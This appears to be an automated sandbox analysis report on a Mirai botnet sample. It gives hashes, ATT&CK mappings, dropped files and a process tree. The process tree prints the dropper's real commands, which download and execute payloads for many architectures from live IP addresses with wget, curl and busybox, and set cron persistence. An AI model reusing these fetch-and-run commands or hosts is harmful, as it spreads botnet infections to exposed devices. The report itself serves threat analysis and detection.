mirai | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

Analysis

max time kernel
91s
max time network
150s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
02/09/2024, 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Size

8KB
MD5

86311599eaaff9e71ddc72ada1b21c2e
SHA1

572f97e41071d072dfc97127454d4978b50a81e2
SHA256

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
SHA512

74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
SSDEEP

96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score

10^/10

mirai botnet discovery persistence

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (23100) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Executes dropped EXE 10 IoCs

ioc	pid	Process
/bin/feankzzyx	726	feankzzyx
/bin/feankzzyx	730	feankzzyx
/bin/feankzzyx	734	feankzzyx
/bin/feankzzyx	746	feankzzyx
/bin/feankzzyx	763	feankzzyx
/bin/feankzzyx	779	feankzzyx
/bin/feankzzyx	795	feankzzyx
/bin/feankzzyx	799	feankzzyx
/bin/feankzzyx	803	feankzzyx
/bin/feankzzyx	817	feankzzyx

Creates/modifies Cron job 1 TTPs 3 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.LqWZnU	crontab
File opened for modification	/var/spool/cron/crontabs/root	feankzzyx
File opened for modification	/var/spool/cron/crontabs/tmp.0hSDfU	crontab

Writes file to system bin folder 1 TTPs 53 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/mxfhstw	feankzzyx
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/current_user2	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/allah_is_satan	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/ALLAH_IS_EVIL.txt	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	drwr@plflli	817	feankzzyx

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/allah_is_prick.html	feankzzyx

/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
1⤵
- Writes file to system bin folder
PID:693
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:697
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:698
- /usr/bin/whoami
  whoami
  2⤵
  PID:704
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:707
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:717
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:725
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:726
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:728
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:729
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:730
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:732
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:733
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:734
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:736
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:745
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:746
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:749
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:761
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:763
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:766
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:778
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:779
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:784
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:794
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:795
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:797
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:798
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:799
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:801
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:802
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:803
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:805
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:815
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Changes its process name
  - Writes file to tmp directory
  PID:817
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:847
  - - /bin/hostname
      hostname -I
      4⤵
      PID:853
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:848
  - - /bin/hostname
      hostname -I
      4⤵
      PID:855
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:849
  - - /bin/hostname
      hostname -I
      4⤵
      PID:854
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:850
  - - /bin/hostname
      hostname -I
      4⤵
      PID:856
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:851
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:857
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:852
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:858
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:887
  - - /bin/hostname
      hostname -I
      4⤵
      PID:889
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:888
  - - /bin/hostname
      hostname -I
      4⤵
      PID:890
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:901
  - - /bin/hostname
      hostname -I
      4⤵
      PID:902
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:900
  - - /bin/hostname
      hostname -I
      4⤵
      PID:903
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:928
  - - /bin/hostname
      hostname -I
      4⤵
      PID:931
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:929
  - - /bin/hostname
      hostname -I
      4⤵
      PID:930
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:955
  - - /bin/hostname
      hostname -I
      4⤵
      PID:958
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:956
  - - /bin/hostname
      hostname -I
      4⤵
      PID:957
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:972
  - - /bin/hostname
      hostname -I
      4⤵
      PID:973
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:835
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:859
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:862
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:863
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:866
- /bin/rm
  rm ff0
  2⤵
  PID:867
- /bin/rm
  rm ff1
  2⤵
  PID:868
- /bin/rm
  rm ff2
  2⤵
  PID:869
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:870
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:871
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:872
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:873
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:874
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:875
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:876
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:877
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:878
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:882
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:891
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:892
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:893
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:894
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Reads runtime system information
  PID:895
- /bin/rm
  rm ff0
  2⤵
  PID:896
- /bin/rm
  rm ff1
  2⤵
  PID:897
- /bin/rm
  rm ff2
  2⤵
  PID:898
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:899
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:904
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:905
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:906
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:907
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:908
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:909
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:910
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:911
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:912
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:913
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:914
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:915
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:916
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:925
- /bin/rm
  rm ff0
  2⤵
  PID:926
- /bin/rm
  rm ff1
  2⤵
  PID:927
- /bin/rm
  rm ff2
  2⤵
  PID:932
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  PID:940
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  PID:941
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  PID:942
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  PID:943
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  PID:945
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  PID:946
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  PID:947
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  PID:948
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  PID:949
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  PID:950
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  PID:951
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  PID:952
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  PID:953
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:954
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:959
- /bin/rm
  rm ff0
  2⤵
  PID:962
- /bin/rm
  rm ff1
  2⤵
  PID:963
- /bin/rm
  rm ff2
  2⤵
  PID:964
- /bin/rm
  rm allah_is_satan
  2⤵
  PID:969
- /bin/sleep
  sleep 13
  2⤵
  PID:971
- /bin/busybox
  busybox ftpget 45.159.211.121 allah_is_satan /firmware/firmware.sh
  2⤵
  PID:970
- /bin/sh
  sh ./allah_is_satan
  2⤵
  PID:974

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/feankzzyx

Filesize
10B

MD5
7d91028619a806f35dac54dd9f656276

SHA1
ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

SHA256
8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

SHA512
9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

Download Submit
/bin/feankzzyx

Filesize
138KB

MD5
17500fa6d517dda14c00b874abb11221

SHA1
fa94505cffed5bbb882d078afcd643194dcf3e1a

SHA256
7621e7779d8779509c477f3ba63e51c91ceca9299ec751927c4c682a437fea87

SHA512
9617b38645d3d7949fc9e6193b739db104e93763e476aa3a44b5219a036ca15e48c650e6c76db77a2fd5aafd67cea5eb9f2916ad7a8ab2ed8b3baac428933831

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/etc/d

Filesize
10B

MD5
de421bfc256606f135c734cadc2504b8

SHA1
321f0281f2b719613a322f682827d96acdbc58d8

SHA256
88a0bfb09e34f8865031e6f7a87b02c05631fa6e5f71ce7860758478951ea02c

SHA512
a152134bf7a48a4fb7a8f5991e5c065301001923e952f24e0e9e032bcce36c871579ef77011e60042c553333f428a956af08057d04728c8c8704ce66c84e5ee8

Download Submit
/etc/d

Filesize
20B

MD5
ab57f6a044de03bcdeec8c51a09295ac

SHA1
4344e7444f40b827c265546e17314982a02074a9

SHA256
0a2fba15422d1a0ffdd132cfc2a468626d77ee3317477aafcdb832a68d69af53

SHA512
781cb1fc9aa158db46a4945f40e005429b8d56d607ac71aec4a5dd2804e75b529b85eab45464c392cf97cf2799d11194bed8fc4b070690f240c81f9a25e73aad

Download Submit
/etc/d

Filesize
30B

MD5
325f5e1ca60d4958bd02aa9c34f47399

SHA1
3d79df234b6955f212d88db1ef794aeb120828bd

SHA256
ead28cd0e3ac0d028fbf3a9ea0f9fefc601b1d68f2a53ca50424978a3439a01b

SHA512
991e9efa0d8af824d687eb1e640d15182b9092c90f8c0a381dbd598be214a035c597659420336856625de8d0dbe189ff956c58e019a30770db375965ec56a3e0

Download Submit
/etc/d

Filesize
40B

MD5
a93a6ac0394215858e5d765d548772ec

SHA1
96acbe4c228f2e1369b1d60704d58cab1f0de9ef

SHA256
f97fa19f4984478d0918fda2842ffe5f3a70c0b0ad5963ab4e74a1a7ff54b070

SHA512
496c1ef3cf3791003af37ea3fc6134b47b3a63b6ba7428d63d403098d55128c444ca743f28fb364876c2b73042e60f71f83da15824c1a3ec03e934f5be21e791

Download Submit
/etc/d

Filesize
60B

MD5
5af42208ee1fc89e66d3764fd915d051

SHA1
25cec2aa2dabcf7f4947479b13e177206a3171d2

SHA256
73acda287dbf09cfcd768477c82806e4cbcc1a4a559bbda635c17a6ec4e14876

SHA512
03bb6a93d6d091c6201458a77b5e98ec84e9894802895d3a316d40f89188e26c38cc398de11945262583888353af562747f9322a726108bb192fa60b4a1af2f2

Download Submit
/tmp/allah_is_prick.html

Filesize
360B

MD5
3a2d9ee3d20a76ed6af3f066be482b64

SHA1
8ee4338df17d6dbbd7cfec1aa0abbd6a7b8081f6

SHA256
9d542210472a30c5142df1f1ac2a25d72a453c5dfad27b09f805691a2e936082

SHA512
715e81e95217eb0d10c1fb3518a589782c2f67bc100e349582cccb5ab5706c4ec931879e3c03717a099d475f8dbec58082cee306c74cd264bd733b5b98aa0b25

Download Submit
/var/spool/cron/crontabs/root

Filesize
46B

MD5
db83f7b956f01e751d85f53ddeaf0beb

SHA1
b2dc5026785aed02e4e8336ab6407e5634dc2c75

SHA256
2e19b7b26592105ac15494950ed61907279930aee07762db0fddf55f8bb6aec0

SHA512
9340e402dfe6cdd7022ba07d6230c56b7022bc1ddb73a1802c3a28370380aeb1ccda1d8428296d46150dcf6171e003af5e902ea7d0a67a16e66ce85e565b50bd

Download Submit
/var/spool/cron/crontabs/tmp.0hSDfU

Filesize
249B

MD5
31ec38ff32ef8f5d0431e772ec984733

SHA1
26daf7c0c880218932ca8d1eae4a456aa74bde78

SHA256
cdec7000fb3d6de5d5230dbadd6a164561ee452f16e4a3a190bafd27da0b71be

SHA512
e45e02b8a2f394fe0756d32a1baf4be818e1f346351fa5f43de60feb333efdfe94f496db124cc9b9e1db36c8f3b4a2bc4fbbe1f664679523259145386401f8ee

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads